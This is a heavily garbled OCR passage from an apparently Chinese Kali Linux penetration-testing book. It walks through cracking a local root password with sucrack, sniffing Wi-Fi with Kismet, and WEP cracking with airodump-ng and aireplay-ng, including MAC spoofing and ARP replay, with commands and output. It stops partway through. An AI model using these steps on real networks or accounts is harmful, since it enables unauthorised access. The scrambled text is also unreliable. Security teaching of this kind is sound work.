硕 望 运行 的 线程 数 。 这 里 建议 仅 使 用 1 ^. AA SRS SIAR AMUN, EIR 3 
秒 后 将 重新 答 试 连接 。 

【实例 8-8] 使 用 SUCrack 破解 本 地 用 户 的 密码 。 使 用 SUCrack 命令 时 ， 需 要 指定 一 
个 密码 文件 。 否 则 ， 将 会 得 到 一 个 搞 关 的 提示 信息 。 执 行 命 令 如 下 所 示 : 

$ sucrack /usr/share/wordlists/wordlist.txt 

password is: 123456 

从 输出 的 信息 中 可 以 看 到 ， 本 地 用 户 root 的 密码 为 123456。 因 为 使 用 su 命令 ， 不 指 
定 用 户 时 ， 默 认 使 用 的 是 根 root 用 户 。 所 以 ， 执 行 以 上 命令 后 ， 破 解 的 是 根 用 户 root 的 
密码 。 

如 果 用 户 想 设置 两 个 线程 ， 每 阳 6 秒 显示 统计 信息 并 想 要 设置 使 用 ANSI 转 义 码 。 执 
行 命令 如 下 所 示 : 


$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt 


Ooo 
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当今 时 代 ， 几 乎 每 个 人 都 离 不 开 网 络 。 尤 其 是 时 常 在 外 奔波 的 人 ， 希 望 到 处 都 有 无 线 
言 号 ， 以 便 随 时 随地 处 理 手头 上 的 工作 。 但 是 在 很 多 情况 下 ， 这 些 无 线 信号 都 需要 身份 验 
证 后 才 可 使 用 。 有 了 时候 可 能 急需 要 网 络 ， 但 是 又 不 知道 其 无 线 密码 ， 这 时 用 户 可 能 非常 着 
急 。 刚 好 在 Kali 中 ,提供 了 很 多 工具 可 以 破解 无 线 网 络 。 本 章 将 介绍 使 用 各 种 渗透 测试 工 
具 ， 实 施 无 线 网 络 攻击 。 


91 无 线 网 络 噢 探 工具 Kismet 


如 朱 要 进行 无 线 网 络 渗透 测试 ， 则 必须 先 扫描 所 有 有 效 的 无 线 接 入 点 。 刚 好 在 Kali 
Linux 中 ， 提 供 了 一 款 嗅 探 无 线 网 络 工具 Kismet。 使 用 该 工具 可 以 测量 周围 的 无 线 信和 号 ， 
并 得 看 所 有 可 用 的 无 线 接 入 点 。 本 下 将 介绍 使 用 Kismet 工具 噢 探 无 线 网 络 。 

(1) 局 动 Kismet 工具 。 执 行 命令 如 下 所 示 : 

root@kali:~# kismet 


执行 以 上 命令 后 ， 将 显示 如 图 9.1 所 示 的 界面 。 


root@kali: ~ 
文件 (F) 编辑 (E) 查看 (V) 搜索 (5) 终端 (T) 帮助 (H) 


Kismet 


Not 
Connected 


图 9.1 终端 延伸 


(2) 该 界面 用 来 设置 是 否 是 用 终端 默认 的 颜色 。 因 为 Kismet 扒 认 颜色 是 灰色 ， 可 能 一 
些 终 闹 不 能 显示 。 这 里 使 用 默认 的 颜色 ， 选 择 Yes， 将 显示 如 图 9.2 所 示 的 界面 。 
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root@kali: ~ 
文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (T) 帮助 (H) 


”Kismet Sort View Windows 


Kismet 


Not 
Connected 


图 9.2 使 用 root 用 户 运行 Kismet 


(3) 该 界面 提示 正在 使 用 root 用 户 运 行 Kismet 工具 。 此 时 , 选择 OK, 将 显示 如 图 9.3 
所 示 的 界面 。 


root@kali: ~ 一 | O | X 
文件 (F) HIRE 查看 (V) IERS) 终端 (T) 标签 (8) 帮助 (H) 


! root(Qkali: ~ | | root@kali: ~ < | root@kali: ~ < | root@kali: /usr/sha... » 


~ Kismet Sort View Windows 
Not 
Connected 


k 


| | 
W1L 


met server ' lo 
attempt to 1 


| 
9 Ki: 
Ls 


图 9.3 AJJAJ Kismet 服务 


(4) 该 界面 提示 是 否 要 目 动 司 动 Kismet 服务 。 这 里 选择 Yes， 将 显示 如 图 9.4 所 示 的 
界面 。 

(5) 该 界面 显示 设置 Kismet 服务 的 一 些 信 息 。 这 里 使 用 默认 设置 ， 并 选择 Start, K 
显示 如 图 9.5 所 示 的 界面 。 

(6) 该 界面 显示 没有 被 定义 的 包 资 源 ， 是 否 要 现在 添加 。 这 里 选择 Yes， 将 显示 如 图 
9.6 所 示 的 界面 。 
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图 9.4 ”启动 Kismet 服务 图 9.5 添加 包 资 源 


CI) 在 该 界面 指定 无 线 网 卡 接口 和 摘 述 信息 。 在 Intf 中 ， 输 入 无 线 网 卡 接 口 。 如 果 无 
线 网 卡 已 处 于 监听 模式 ， 可 以 输入 wlan0 或 mon0。 其 他 信息 可 以 不 添加 。 然 后 单 击 Add 
按钮 ， 将 显示 如 图 9.7 所 示 的 界面 。 


root@kali: ~ | 
文件 (F) ”编辑 (E) ESV) 搜索 (5) 终端 {T) 标签 (8) 帮助 (H) 
| root@kali. - | root@kali, - * | root@kali, - * \ rout@keli: /usr/sha... 


Intf 


图 9.6 添加 资源 窗口 图 9.7 关闭 控制 台 窗 口 


(8) 在 该 界面 选择 Close Console Window 按钮 ， 将 显示 如 图 9.8 所 示 的 界面 。 


root@kali: ~ ma" D | m 
Xf*(F) WE SAV) IERS) 终端 T) 标签 (B) BIIH) 
oe ; x x == 
root@kali: ~ < | root@kali: ~ * \root@kali: ~ X \ root@kali: /usr/shar... * 


~ Kismet Sort View Windows 


Elapsed 
00: 04. 21 


Networks 


Packets 
95584 


Pkt/ Sec 
524 


Filtered 
Packets 0 


9: D3, encrn ypt ic in no 54.00 mbit 
INFO: Detected SW yec 1D " CMCC EDU", BSSID D 
A1: 0 3 yp 130, channel O, 54.00 mbit 
INFO: Detec ted new ed network "CMCC- AUTO", BSSID EA: 64: C7: 2 
41:07, encryption yes, channel 0, 54,00 mbit 


图 9.8 扫描 的 无 线 信息 
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(9 六 该 界面 显示 的 信息 ， 束 是 正在 噢 探 该 无 线 网 络 中 的 信号 。 当 运行 一 定时 间 后 ， 停 
也 修改 。 在 该 界面 单 击 Kismet 菜单 选项 并 选择 Quit 命令 ， 如 图 9.9 所 示 的 界面 。 
(10) 按 下 Quit 命令 后 ， 将 显示 如 图 9.10 所 示 的 界面 。 


文件 (F) ”编辑 (E) 查看 (V) 搜索 (5S) # 


root@kali: ~ x \rootGe/wor... * 


~ Sort View Windows 
ali 


Lapsed 
a 


etworks 


ackets 
AS SE 


kt/ Sec 


iltered [ Kill] 


图 9.9 退出 Kismet 图 9.10 停止 Kismet 服务 


(11) 在 该 界面 单 击 Kill， 将 停止 Kismet 服务 并 退出 终 六 模式 。 此 时 ， 终 端 将 会 显示 
一 些 日 志 信 AA, 如 下 所 示 : 


*** KISMET CLIENT IS SHUTTING DOWN *** 

[SERVER] INFO: Stopped source 'wlanO' 

[SERVER] ERROR: TCP server client read() ended for 127.0.0.1 

[SERVER] 

[SERVER] *** KISMET IS SHUTTING DOWN *** 

[SERVER] INFO: Closed pcapdump log file 'Kismet-20140723-17-19-48-1. pcapdump', 
[SERVER] 155883 logged. 

[SERVER] INFO: Closed netxml log file 'Kismet-20140723-1 7-19-48-1.netxml', 26 
[SERVER] logged. 

[SERVER] INFO: Closed nettxt log file 'Kismet-20140723-1 7-19-48-1 .nettxt’, 26 

[SERVER] logged. 

[SERVER] INFO: Closed gpsxml log file 'Kismet-20140723-17-19-48-1.gpsxml', 0 logged. 
[SERVER] INFO: Closed alert log file 'Kismet-20140723-17-19-48-1.alert', 5 logged. 
[SERVER] INFO: Shutting down plugins... 

[SERVER] Shutting down log files... 

[SERVER] WARNING: Kismet changes the configuration of network devices. 


[SERVER] In most cases you will need to restart networking for 
[SERVER] your interface (varies per distribution/OS, but 
[SERVER] usually: /etc/init.d/networking restart 

[SERVER] 


[SERVER] Kismet exiting. 
Spawned Kismet server has exited 
*** KISMET CLIENT SHUTTING DOWN. *** 


Kismet client exiting. 

从 以 上 信息 的 KISMET IS SHUTTING DOWN 部 分 中 ， 将 看 到 关闭 了 几 个 日 志文 件 。 
这 些 日 志文 件 ， 默 认 保 存在 上 foot 目录 。 在 这 些 日 志文 件 中 ， 显 示 了 生成 日 志 的 时 间 。 当 运 
fT Kismet 很 多 次 或 几 天 时 ， 这 些 时 间 是 非常 有 帮助 的 。 

接 下 来 分 析 一 下 上 面 捕获 到 的 数据 。 切 换 到 上 oot 上 目录， 并 使 用 Is 命令 答 看 以 上 生成 的 
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日 志 了 文件。 执行 命 令 如 下 所 示 : 
root@kali:~# Is Kismet-20140723-17-19-48-1.* 
Kismet-20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxml 
Kismet-20140723-17-19-48-1.gpsxml Kismet-20140723-17-19-48-1.pcapdump 
Kismet-20140723-1 7-19-48-1 .nettxt 
从 输出 的 信息 中 ， 可 以 看 到 有 五 个 日 志文 件 ， 并 且 使 用 了 不 同 的 后 级 名 。Kismet 工具 
生成 的 所 有 信息 ， 都 保存 在 这 些 文件 中 。 下 面 分 别 介 绍 下 这 几 个 文件 的 格式 。 
Q alert: 该 文件 中 包括 所 有 的 警告 信息 。 
gpsxml: 如 条 使 用 了 GPS 源 ， 则 相关 的 GPS 数据 保存 在 该 文件 中 。 
nettxt: 包括 所 有 收集 的 文本 输出 信息 。 
netxml: 包括 所 有 XML 格式 的 数据 。 
pcapdump: 包括 整个 会 话 捕获 的 数据 包 。 
下 面 主要 介绍 一 下 PCAP 和 Text 文件 的 工具 。 


1. 使 用 Wireshark 分 析 PCAP 信 和 号 帧 


Oooo 


(1) 启动 Wireshark。 执 行 命令 如 下 所 示 : 
root@kali:~# wireshark & 


(2) 打开 pcapdump 文件 。 在 Wireshark 界面 的 菜单 栏 中 依次 选择 FilelOpen 命令 ， 将 
显示 如 图 9.11 所 示 的 界面 。 


Wireshark: Open Capture File 


v | 大 小 修改 日 期 


| Kismet-20140723-17-19-48-1 alert 1.0 KB 17:24 
lg Kismet-20140723-17-19-48-1.gpsxml 264 字 节 17:26 
|] Kismet-20140723-17-19-48-1.nettxt 35.7 KB 17:24 
lo) Kismet-20140723-17-19-48-1.netxml 81.7KB 17:24 
B Kismet-20140723-17-19-48-1.pcapdump 16.8MB 17:26 
linux-3.14.6.tar 534.2 MB 2014406118 
Nessus-5.2.6-debian6.i386.deb 28.44 MB 2014f£04H16H 
| replay-arp-0723-171023.cap 806 $75 1711 
Fates) |] Filename: Kismet-20140723-17-19-48-1.pcapdump 
Format: Wireshark/tcpdump/... - libpcap 
Enable MAC name resolution Size: 17643643 bytes 
[.] Enable network name resolution Packets: 155883 
Enable transport name resolution First Packet: 2014-07-23 17:21:12 
Elapsed time: 00:05:00 


图 9.11 选择 捕获 的 pcapdump 文件 


(3) 在 该 界面 选择 Kismet 工具 捕获 的 pcapdump 文件 ， 然 后 单 击 “ 打 开 ” 按 钮 ， 将 显 
示 如 图 9.12 所 示 的 界面 。 


i i 


qw 
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Kismet-20140723-17-19-48-1.pcapdump [Wireshark 1.8.5 ] 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


Jaaa naxe H» a FH OS aaah 


No. Time 
1 0.000000 
2 0.000575 
3 0.001190 
4 0.001552 
5 0.001963 
6 0.003905 
7 0.004127 
8 0.004936 


9 0.005301 
1N N nnsass 


| Source 

Tp-LinkT ac:fb:20 
Tp-LinkT ac:fb:20 
Tp-LinkT ac:fb:20 


Tp-LinkT ac:fb:20 
Tp-LinkT ac:fb:20 


00:c1:40:76:05:6c 
Tp-LinkT ac:fb:20 
Tp-LinkT ac:fb:20 
Tn-l inkT ac:fh:2n 


Destination 

00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
Broadcast 

00:c1:40:76:05:6c 
00:c1:40:76:05:6c 
AA cl AN 76: 05* Ae 


Apply 保存 


Clear 


Protocol Length Info 


802.11 
802.11 
802.11 
802.11 
802.11 

(R. 802.11 


Flags-... 
Flags=... 
Flags=... 


58 Deauthentication, 
58 Deauthentication, 
58 Deauthentication, 
58 Deauthentication, SN=0, FN=0, Flags=... 
58 Deauthentication, SN=0, FN=0, Flags-... 
42 Acknowledgement, Flags=........ 

118 Data, SN-1600, FN=0, Flags-.p..... T 

58 Deauthentication, SN-0, FN-O, 

58 Deauthentication, SN-0, FN-O, 

SR Deauthenticatinn SN=A FN=N 


SN=0, FN=0, 
SN-0, FN-0, 
SN=0, FN-O, 


图 9.12. peapdump 文件 数据 包 


(4) 从 该 界面 可 以 看 到 ，Kismet 扫描 到 的 所 有 无 线 网 络 数据 包 。Beacon 包 是 无 线 设 备 
基本 的 管理 包 ， 用 来 发 送信 号 通知 其 他 的 服务 。 
2. 分 析 Kismet 的 Text 文 件 


在 Linux 中 ,可 以 使 用 各 种 文本 编辑 器 打开 nettxt 文件 , 或 者 使 用 cat 命令 得 看 该 文件 
内 容 。 下 面 使 用 Linux 默认 的 文本 编辑 器 打开 nettxt 文件 ， 如 图 9.13 所 示 。 


Kismet-20140723-17-19-48-1.nettxt (~) - VIM mm 


文件 (F) 编辑 (E) 工具 (T) 语法 (5) 缓 中 区 (B) 窗口 (W) 帮助 (H) 


ge OAS »6 x 


Kismet (http://www.kismetwireless.net) 
Wed Jul 23 17:19:48 2014 - Kismet 2013.03.RO0 


Network 1: BSSID 14:E6:E4:AC:FB:20 


Manuf : Tp-LinkT 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 
Type : infrastructure 
BSSID : 14:E6: E4: AC: FB: 20 
SSID 1 
Type : Beacon 
SSID : "Test" 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 
Max Rate 54.0 
Beacon : 10 
Packets : 297 
Encryption : WEP 
Channel « 1 
Frequency : 0 - 75050 packets, 71.46% 
Frequency : 2412 - 27652 packets, 26.33% 
Frequency : 2417 - 2302 packets, 2.19* 


Ff Foe C) Db 全 B 


23,1 


"EMT 


9.13 nettxt 文件 内 容 


从 该 界面 可 以 看 到 nettxt 文件 中 有 大 量 的 信息 ， 列 出 了 扫描 到 的 每 个 无 线 网 络 。 每 个 
无 线 网 络 都 有 一 个 标签 ， 并 且 列 出 了 连接 到 这 些 无 线 网 络 的 每 个 客户 端 ， 如 图 9.14 所 示 。 

从 该 界面 可 以 看 到 一 个 Client1， 其 MAC 地 址 为 00:c1:40:76:05:6c。 它 表示 一 个 MAC 
地 址 为 00:c1:40:76:05:6c 的 客户 端 连接 到 了 一 个 无 线 接 入 点 。 
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Kismet-20140723-17-19-48-1.nettxt (~) - VIM MENFES 


文件 (F) WWE 工具 (T) 语法 (S) 缓冲 区 (B) 窗口 (W) 帮助 (H) 
品 5 B = 9 @ 2e H BA p s Ce & 32 分 B 


Client 1: MAC 00:C1:40:76:05:6C Al 
Manuf : Unknown = 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 
Type : To Distribution 
MAC : 00:C1:40:76:05:6C 
Channel : 0 
Frequency : O - 74538 packets, 100.00% 

Max Seen : 1000 
LLC : 

Data : 74538 
Crypt : 74538 
Fragments : O 
Retries : 0 

Total : 74538 
Datasize : 6385686 


Seen By : wlanO (wlanOmon) bOSSeceO-124a-11e4-bbef-dcO4bb23e201 74538 packe 
ts 
Wed Jul 23 17:24:48 2014 
Client 2: MAC 14:E6:E4: AC: FB: 20 


Manuf : Tp-LinkT 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 v 


图 9.14 客户 端 信息 


92 使 用 Aircrack-ng 工具 破解 无 线 网 络 


Aircrack-ng 是 一 款 基 于 破解 无 线 802.11 协议 的 WEP 及 WPA-PSK 加 密 的 工具 。 该 工 
具 主 要 用 了 两 种 攻击 方式 进行 WEP 破解 。 一 种 是 FMS 攻击 , 该 攻击 方式 是 以 发 现 该 WEP 
漏洞 的 研究 人 员 名 字 (Scott Fluhrer, Itsik Mantin 及 Adi Shamir) 所 命名 ; 另 一 种 是 Korek 
攻击 ， 该 攻击 方式 是 通过 统计 进行 攻击 的 ， 并 且 该 攻击 的 效率 要 远 蜗 于 FMS 攻击 。 本 节 将 
介绍 使 用 Aircrack-ng 破解 无 线 网 络 。 


9.2.1 破解 WEP 加 密 的 无 线 网 络 


Wired Equivalent Privacy 或 WEP (有 线 等 效 加 密 ) 协议 是 对 在 两 台 设 备 间 无 线 传输 的 
数据 进行 加 密 的 方式 ， 用 以 防止 非法 用 户 鳃 听 或 侵入 无 线 网 络 。 不 过 密码 分 析 学 家 已经 找 
出 WEP 好 几 个 弱点 ， 因 此 在 2003 年 被 Wi-Fi Protected Access (WPA) 淘汰 ， 义 在 2004 
年 由 完整 的 IEEE 802.11i 标准 (又 称 为 WPA2)〉 所 取代 。 本 小 节 将 介绍 破解 WEP 加 密 的 
无 线 网 络 。 

使 用 Aircrack 破解 使 用 WEP 加 密 的 无 线 网 络 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 使 用 airmon-ng 命令 得 看 当前 系统 中 的 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 


kali:~# airmon-ng 
Interface Chipset Driver 
wlanO Ralink RT2870/3070 rt2800usb - [phy1] 


MH fe eon. SH ARS FETE TARE Mh AAR EY Interface 列 ， 可 


aE a. 
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以 看 到 当 采 系统 的 无 线 接 口 为 wlan0。 

(2) 修改 wland 接口 的 MAC 地 址 。 因 为 MAC 地 址 标识 主机 所 在 的 网 络 ， 修 改 主机 
的 MAC 地 址 可 以 隐藏 真实 的 MAC 地 址 。 在 修改 MAC 地 址 之 前 ， 需 要 停止 该 接口 。 执 行 
命令 如 下 所 示 : 


root@kali:~# airmon-ng stop wlan0 # 停 止 wlan0 接口 
Interface Chipset Driver 
wlan0 Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode disabled) 


或 者 : 
root@kali:~# ifconfig wlan0 down 


执行 以 上 命令 后 ，wlan0 接口 则 停止 。 此 时 就 可 以 修改 MAC 地 址 了 ， 执 行 命令 如 下 
所 示 : 


root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0 
Permanent MAC: 00:c1:40:76:05:6c (unknown) 

Current MAC: 00:c1:40:76:05:6c (unknown) 

New MAC: 00:11:22:33:44:55 (Cimsys Inc) 


输出 的 信息 显示 了 wlan0 接口 永久 的 MAC 地 址 、 当 前 的 MAC 地 址 及 新 的 MAC 地址 。 
可 以 看 到 wlan! 接口 的 MAC 地 址 已 经 被 修改 。 
(3) 重新 启动 wlan0。 执 行 命令 如 下 所 示 : 


root@kali:~# airmon-ng start wlanO 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 

a short period of time, you may want to kill (some of) them! 

-e 

PID Name 

2567 NetworkManager 

2716 dhclient 

15609 wpa_supplicant 

Interface Chipset Driver 

wlanO Ralink RT2870/3070 rt2800usb - [phy1] 
(monitor mode enabled on monO) 


输出 的 信息 显示 了 无 线 网 卡 wano 的 必 片 及 驱动 类 型 。 例 如 ， 当 前 系统 的 无 线 网 卡 心 
片 为 Ralink RT2870/3070; 默认 驱动 为 rt2800usb， 并 显示 监听 模式 被 后 用 ， 有 映射 网 络 接口 
为 mond. 

有 时 候 使 用 airmon-ng start wlan0 命令 启用 无 线 网 卡 时 ， 可 能 会 出 现 SIOCSIFFLAGS: 
Operation not possible due to RF-kill 错误 。 这 是 因为 Linux 下 有 一 个 软件 REF-kill， 该 软件 为 
了 省 电 会 将 不 使 用 的 无 线 设 备 (如 WIFI 和 Buletooth) 自动 关闭 。 当 用 户 使 用 这 些 设备 时 ， 
RF-kill 不 会 智能 的 自动 打开 ， 需 要 手动 解锁 。 用 户 可 以 执行 rfkill list 命令 查看 所 有 设备 ， 
如 下 所 示 : 


root@kali:~# rfkill list 

0: ideapad wlan: Wireless LAN 
Soft blocked: yes 

Hard blocked: no 

1: phyO: Wireless LAN 

Soft blocked: yes 


. 274° 


Hard-blocked: no 


该 列表 中 前 面 的 编写， 表示 的 是 设备 的 索引 写 。 用 户 可 以 通过 指定 索 
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用 条 个 设备 。 如 局 用 所 有 设备 ， 执 行 如 下 所 示 的 命令 : 


root@kali:~# rfkill unblock all 


g|*9, f 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 以 上 命令 表示 ， 解 除 所 有 被 天 闭 的 设备 。 
(4) 使 用 airodump 命令 定位 附近 所 有 可 用 的 无 线 网 络 。 执 行 命令 如 下 所 示 : 


root@kali:~# airodump-ng wlan0 
CH 2][ Elapsed: 1 min ][ 2014-05-15 17:21 


BSSID PWR Beacons #Data,#/sCH MB ENC CIPHER AUTH ESSID 
14:E6:E4:AC:FB:20 -30 40 13 0 1 54e WEP WEP Test 
8C:21:0A:44:09:F8 41 24 2 0 6 954e WPA2 CCMP PSK _ yztt 
14:E6:E4:84:23:7A E 17 1 0 1 54e WPA2 CCMP PSK  yzb« 
C8:64:C7:2F:A1:34 -64 19 0 0 1 54 OPN CMCC 
1C:FA:68:D7:11:8A -64 37 0 0 1 54e WPA2 CCMP PSK TPI 
EA:64:C7:2F:A1:34 -64 18 0 0 1 54. WPA2 CCMP MGT CMCC- 
DA:64:C7:2F:A1:34 -64 18 0 0 1 54 OPN CMCC- 
4A:46:08:C3:99:DC -66 7 0 0 1 954. OPN CMCC- 
E0:05:C5:E7:68:84 -67 17 0 0 1 54. WPA2 CCMP PSK TPI 
9A:46:08:C3:99:DC -67 10 0 0 1 54. WPA2 CCMP MGT CMCC- 
CC:34:29:5A:8E:BO -68 26 0 0 6 54e WPA2 CCMP PSK  TP.I 
5A:46:08:C3:99:D9 -68 9 0 0 11 54. WPA2 CCMP MGT  CMCC- 
9A:46:08:C3:99:D3 -68 16 0 0 6 54. WPA2 CCMP MGT  dleng 
38:46:08:C3:99:D9 -68 9 0 0 11 54. OPN CMCC 
9C:21:6A:E8:89:E0 -68 27 0 0 11 54e. WPA2 CCMP PSK TPI 
EA:64:C7:2F:A0:FF -68 7 0 0 11 54. WPA2 CCMP MGT CMCC- 


DA EA] EH IY fi A ie aN SA Ar YC INE AE. 733 80H] RG 76 Zt EH Ar 
f& F Ctrl+C 键 停止 搜索 。 
从 输出 的 信息 中 看 到 有 很 多 参数 。 详 细 介 绍 如 下 所 示 。 


L] BSSID: 无 线 的 卫 地 址 。 

Q PWR: 网 卡 报告 的 信号 水 平 。 

口 Beacons: 无 线 发 出 的 通告 编号 。 

Q ZData: 被 捕获 到 的 数据 分 组 的 数量 ， 包 括 广 播 分 组 。 

Q #/s: 过 去 10 秒 钟 内 每 秒 捕获 数据 分 组 的 数量 。 

O CH: 信道 号 (从 Beacons 中 获取 ) o 

O MB: 无 线 所 支持 的 最 大 速率 。 如 果 MB=11， 它 是 802.11b; WR MB=22， 它 是 
802.11b+; 如 果 更 高 就 是 802.11g。 后 面 的 点 (高 于 54 之 后 ) 表明 支持 短 前 导 公 。 

Q ENC: 使 用 的 加 密 算法 体系 。 OPN 表示 无 加 密 。 WEP? 表示 WEP 或 者 WPA/WPA2 
模式 ，WEP (没有 问号 ) 表示 静态 或 动态 WEP。 如 果 出 现 TKIP 或 CCMP, WA 

口 CIPHER: 检测 到 的 加 密 算 法 ， 是 CCMP、WRAAP、TKIP、WEP 和 WEP104 中 


的 一 个 。 典 型 的 来 说 (不 一 定 ) ，TKIP 与 WPA 结合 使 用 ，CCMP 与 WPA2 结合 
使 用 。 如 果 密 钥 索 引 值 大 于 0， 显 示 为 WEP40。 标 准 情况 下 ， 索 引 0-3 是 40bit, 
104bit 应 该 是 0。 


"urs 


n 
n 
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AUTH: 使 用 的 认证 协议 。 常 用 的 有 MGT (WPA/WPA2 使 用 独立 的 认证 服务 器 ， 
平时 我 们 常 说 的 802.1x、radius 和 eap 等 ) SKA (WEP 的 共享 密 铀 ) ~ PSK 
CWPA/WPA2 的 预 共 享 密 钥 ) 或 者 OPN (WEP 开放 式 ) 。 

ESSID: 指 所谓 的 SSID 号 。 如 果 启 用 隐藏 的 SSID 的 话 ， 它 可 以 为 空 。 这 种 情况 
F, airodump-ng 试图 从 proberesponses 和 associationrequests 中 获取 SSID. 
STATION: 客户 端的 MAC 地 址 ， 包 括 连 上 的 和 想 要 搜索 无 线 来 连接 的 客户 端 。 
Wn RA Pim AEE b. RYE BSSID 下 显示 “notassociated”。 

Rate: 表示 传输 率 。 

Lost: 在 过 去 10 秒 钟 内 丢失 的 数据 分 组 ， 基 于 序列 号 检测 。 它 意味 看 从 客户 并 来 
的 数据 丢 包 ， 每 个 非 管 理 帧 中 都 有 一 个 序列 号 字段 ， 把 刚 接 收 到 的 那个 帧 中 的 序 
列 号 和 前 一 个 帧 中 的 序列 号 一 减 就 能 知道 丢 了 几 个 包 。 

Frames: 客户 端 发 送 的 数据 分 组 数量 。 


Probe: 被 客户 站 得 探 的 ESSID。 如 条 客户 中正 试图 连接 一 个 无 线 ， 但 是 没有 连接 
ABA ENE AN TERR HE 


(5) 使 用 airodump-ng 捕获 指定 BSSID 的 文件 。 执 行 命令 如 下 所 示 。 
airodump-ng 命令 常用 的 选项 如 下 所 示 。 


n 
n 
d 


-c: 指定 选择 的 频道 。 
-w: 指定 一 个 文件 名 ， 用 于 保存 捕获 的 数据 。 
-bssid: 指定 攻击 的 BSSID. 


下 和 面 将 Bssid 为 14:E6:E4:AC:FB20 的 无 线路 由 霹 作 为 攻击 目标 。 执 行 命令 如 下 所 未: 


root@kali:~# airodump-ng —c 1 —w wirelessattack --bssid 14:E6:E4:AC:FB:20 monO 
CH 1 ][ Elapsed: 9 mins ][ 2014-05-15 17:31 


BSSID PWR RXQ Beacons #Data,#/s CH MB ENC CIPHER AUTH ESSID 


14:E6:E4:AC:FB:20 -37 0 5175 216 0 1 54e WEP WEP OPN Test 


BSSID STATION PWR Rate Lost Frames Probe 
14:E6:E4:AC:FB:20 DETIZ2 33:44:55 0 0 - 1 117 88836 
14:E6:E4:AC:FB:20 18:DC:56:F0:62:AF -24 54 -54e 654 312 
14:E6:E4:AC:FB:20 08:10:77:0A:53:43 -36 0-1 6 9832 


从 输出 的 信息 中 可 以 看 到 ESSID 为 Test LRK Hat #Data 一 直 在 变化 ， 表示 有 客户 
端正 与 无 线 发 生 数 据 交 换 。 以 上 命令 执行 成 功 后 ， 会 生成 一 个 名 为 wirelessattack-01.ivs 的 
文件 ,而 不 是 wirelessattack.ivs。 这 是 因为 airodump-ng 工具 为 了 方便 后 面 破 解 的 时 候 调 用 ， 
所 有 对 保存 文件 按 顺 序 编 了 号 ， 于 是 就 多 了 -01 这 样 的 序号 ， 以 此 类 推 。 在 进行 第 二 次 攻 
iil. 知 使 用 同样 文件 名 wirelessattack 保存 的 话 ， 束 会 生成 名 为 wirelessattack-02.ivs 文件 。 

(6) 打开 一 个 新 的 终端 窗口 ， 运 行 aireplay 命令 。aireplay 命令 的 语法 格式 如 下 所 示 : 

aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface] 

aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface] 

JAZ) aireplay， 执 行 命令 如 下 所 示 : 

root@kali:~# aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0 


si 
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The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h). 
ifconfig monO hw ether 00:11:22:33:44:55 
Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1 


T2917 
17:251; 
yess I 
17:25:19 
17:25:19 
1/25 271 
11:25:21 
Via 
T 29024 
fee 
iT Aa 
T2752 
17:25:27 


Sending Authentication Request (Open System) [ACK] 


Switching to shared key authentication 
Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 
Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 
Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 
Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 
Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 


17:25:29 Sending Authentication Request (Shared Key) [ACK] 
17:25:29 Switching to shared key authentication 


(7) 使 用 aireplay Ris AEA TCA Hat, DAR T Hé Ud RPA ZA UU 
下 所 示 : 
aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface] 


执行 命令 如 下 所 示 : 


root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0 
The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h). 
ifconfig monO hw ether 00:11:22:33:44:55 
17:26:54 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1 
Saving ARP requests in replay arp-0515-172654.cap 
You should also start airodump-ng to capture replies. 
Notice: got a deauth/disassoc packet. Is the source MAC associated ? 
Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 packets...(499 pps 
Read 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packets...(499 pps 
Read 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packets...(499 pps 
Read 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packets...(499 pps 
Read 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packets...(499 pps 
Read 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 packets...(500 pps 
Read 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packets...(500 pps 
Read 336/ packets (got 1 ARP requests and 525 ACKs), sent 548 packets...(499 pps 
Read 368/ packets (got 1 ARP requests and 5/6 ACKs), sent 598 packets...(499 pps 
Read 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 packets...(500 pps 
Read 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packets...(500 pps 
Read 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 packets...(500 pps 
Read 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packets...(499 pps 
Read 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packets...(499 pps 


fa B fes LAE HEA ARP Requests 的 方式 来 谈 取 ARP 请 求 报 文 的 过 程 ， 此 时 加 到 
